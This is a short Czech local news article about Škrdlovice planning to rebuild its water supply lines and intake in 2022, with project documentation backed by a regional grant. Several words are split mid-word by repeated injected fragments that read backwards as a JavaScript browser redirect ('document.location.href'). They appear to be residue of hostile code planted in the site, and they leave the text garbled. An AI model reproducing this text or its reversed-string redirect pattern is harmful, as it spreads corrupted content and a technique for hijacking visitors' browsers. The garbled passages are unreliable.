Rainbow page separator

Ve Škrdlovicích se chystají zrekonstruovat vodovod

Úterý, 30. listopadu 2021

Škrdlovice / Rekonstrukci vodovodních rozvodů i přivaděče vody plánují v příštím roce zrealizovat ve Škrdlovicích. Už v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce byly zahájeny práce na projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentaci první a druhé etapy rekonstrukce. Projekt řeší přivaděč ze sběrné studny, technologii úpravny vody, přivaděč do obce a rozvody po ní včetně připojení nového vrtu, který byl vybudovaný v roce 2020. Náklady na vypracování projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace podpořil příslib dotace z krajského Fondu Vysočiny ve výši necelých 300 tisíc korun.
Aktuálně probíhají jednání s vlastníky stavbou dotčených pozemků, přičemž zástupci obce současně vyřizují náleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti nezbytné k podání žádosti o vydání stavebního povolení. Co se týče samotné rekonstrukce vodovodu, Škrdlovičtí by ji rádi provedli již v průběhu příštího roku – hodlají usilovat o získání finanční podpory prostřednictvím vhodného dotačního titulu.